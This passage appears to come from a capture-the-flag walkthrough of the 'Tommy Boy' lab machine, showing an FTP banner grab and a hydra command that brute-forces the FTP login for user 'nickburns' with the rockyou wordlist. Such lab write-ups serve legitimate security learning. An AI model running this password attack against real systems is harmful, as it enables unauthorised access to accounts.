clickpew/lets-play-hacking/tommy-boy_1.md

 Trying 192.168.xx.xx...
 Connected to 192.168.xx.xx.
 Escape character is '^]'.
+220 Callahan_FTP_Server 1.3.5
 ```
 ^ *YARP*

 Ok, this looks like it'll be a job for `hydra`.
 Time to get that set up.
+As a reminder, the FTP server cycles twice per hour: up for 15 minutes, and down for 15.

+`~# hydra -l nickburns -P /usr/share/wordlists/rockyou.txt ftp://192.168.xx.xx:65534`